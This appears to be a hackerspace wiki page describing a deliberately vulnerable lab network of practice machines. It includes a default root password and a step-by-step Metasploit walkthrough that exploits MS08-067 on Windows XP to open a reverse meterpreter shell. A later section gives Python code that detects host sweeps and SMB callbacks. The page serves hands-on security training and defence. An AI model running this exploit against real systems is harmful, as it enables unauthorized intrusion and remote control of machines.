From Interlock Rochester Wiki
The warzone is a playground for security hackers. When joining this network you should assume that you will be attacked by other people on the network or the network itself. For those interested, there are systems set up that are designed to be exploited in different ways.
Feel free to poke around the network, set up your own boxes and services, make a honeypot, pop a box, or just watch the traffic.
- DOS is for newbs: Denial of service attacks are always possible with this setup. Intentional simple denial of service attacks (like ARP poisoning to nowhere or crashing switches) will be met with frowny faces and "pfffs" from your fellow members.
- You break it, you bought it: If you are hacking away and the system or service becomes unresponsive, please do your best to bring it back up. If all else fails, talk to antitree.
- Take off your whitehat: Please don't break in and fix a hole for someone else. The network is designed for all skill levels and we'd like to keep even the simple vulnerabilities open. That being said, if you notice a hole in a member's PoB (personally owned box) it would be nice if you told them.
How to join
- join the wireless network with the ESSID "warzone". "AAAAAAAAAA I don't know the password!" You'll figure it out.
- connect your system to one of the bottom two network jacks around the space
On the network
Damn Vulnerable Linux 00:0C:29:A6:83:1D
Designed to be a fully functioning Linux server with misconfigured/exploitable services. Can you find which ones?
De-ICE 100 00:0C:29:C0:6A:A4
De-ICE 100 is the first of a set of incrementally challenging vulnerable LiveCDs. 100 starts you out with the same kind of services as DVL. Check out their website for the storyline that goes along with it.
De-ICE 110 00:0C:29:C8:8E:3A
De-ICE 110 is the second level of the De-ICE series of vulnerable LiveCDs. Check the website for the storyline that goes along with this server.
Windows XP SP2 00:0C:29:B1:0F:1C
This is a standard Windows XP image based on the images from the FDCC project. It was originally designed from the Metasploit Unleashed training servers. There is nothing particularly special about this, but it is an unpatched system running some extra services. Some of us have already started to make a tagging board for fun.
Damn Vulnerable Web App 00:0C:29:C8:8E:3A
Created by OWASP, DVWA attempts to be a simple web service that was horribly designed. XSS, SQLi, and remote file inclusion are just a few of the problems.
BadStore 123 00:14:22:0b:4a:3e
Not designed to be hacked but for setting up or providing test services.
VMware ESX provides most of the systems that are available on the network.
This is not a designed-to-be-vulnerable distribution but rather a VoIP system for testing vulnerabilities in this type of server.
Backtrack 4 Final
Not designed to be a vulnerable system but it does have all the tools you'll need to exploit the rest of the network. Log in with SSH and use it to pivot through the rest of the network. Username is root and password is toor. All settings are persistent between reboots.
Your first Metasploit Reverse Shell
Steps to hack your first system:
- ssh into the backtrack box (usually 192.168.1.202)
- username root password toor
- run a ping sweep of the network
nmap -sP 192.168.1.0/24
- review the IPs and find where the Windows XP box is hiding
- start metasploit
- at the console use the MS08_067 Netapi exploit
msf > use exploit/windows/smb/ms08_067_netapi
- type show options to see what values are needed
- set the remote host to the IP address you found above
msf > set RHOST 192.168.1.200
- change the default port from 445 to 139
msf > set RPORT 139
- set the payload to the reverse meterpreter shell
msf > set PAYLOAD windows/meterpreter/reverse_tcp
- set the local host to the Backtrack box's IP so the shell knows where to connect back to
msf > set LHOST 192.168.1.202
msf > exploit
If you have everything correct, you should get a meterpreter prompt. Now what can you do??....
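For anyone who would rather watch the traffic than generate it, the walkthrough above leaves two recognisable patterns: a host sweep, and an SMB connection to a target that is quickly followed by the target opening a connection back to the same client. The Python sketch below is an added example, not part of the original wiki page; the flow-record format, thresholds and function names are assumptions, and the sample records are constructed.

```python
from collections import defaultdict

# Constructed flow records (not captured from the warzone network), one per
# line: "<seconds> <src> <dst> <proto> <dst_port>". Addresses follow the page.
SAMPLE = "\n".join(
    [f"{10 + i * 0.01:.2f} 192.168.1.202 192.168.1.{i} arp 0" for i in range(1, 255)]
    + ["60.0 192.168.1.202 192.168.1.200 tcp 139",   # inbound SMB session
       "61.5 192.168.1.200 192.168.1.202 tcp 4444",  # target dials back
       "70.0 192.168.1.50 192.168.1.200 tcp 445",    # ordinary file-share use
       "300.0 192.168.1.200 192.168.1.50 tcp 80"])   # unrelated, much later

def parse(text):
    """Turn flow lines into (ts, src, dst, proto, port) tuples."""
    rows = (line.split() for line in text.strip().splitlines())
    return [(float(t), s, d, p, int(port)) for t, s, d, p, port in rows]

def find_sweeps(flows, min_hosts=20, window=10.0):
    """Sources that touch >= min_hosts distinct addresses within `window` seconds."""
    by_src = defaultdict(list)
    for ts, src, dst, _, _ in flows:
        by_src[src].append((ts, dst))
    hits = set()
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if len({d for _, d in events[start:end + 1]}) >= min_hosts:
                hits.add(src)
                break
    return hits

def find_callbacks(flows, smb_ports=(139, 445), window=30.0):
    """(client, server, port): server opens TCP back to a client soon after that
    client's inbound SMB connection. Matches on direction, not on a fixed port."""
    last_smb = {}  # (server, client) -> time of most recent inbound SMB flow
    hits = []
    for ts, src, dst, proto, port in sorted(flows):
        if proto == "tcp" and port in smb_ports:
            last_smb[(dst, src)] = ts
        elif proto == "tcp" and ts - last_smb.get((src, dst), float("-inf")) <= window:
            hits.append((dst, src, port))
    return hits

if __name__ == "__main__":
    print("sweep sources:", find_sweeps(parse(SAMPLE)))
    print("SMB then callback:", find_callbacks(parse(SAMPLE)))
```

The callback check keys on the reversal of direction rather than on a port number, so it still fires if the listener port is changed; the ordinary file-share client in the sample is not flagged because the later connection falls outside the window.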
- add an onion topology - make multiple layers of the network and have some boxes bridge between the other networks. Attackers have to break into one system to get to the next network.
- Set up standard backups using a virtual appliance
- Add more systems from this resource: http://sourceforge.net/projects/virtualhacking/files/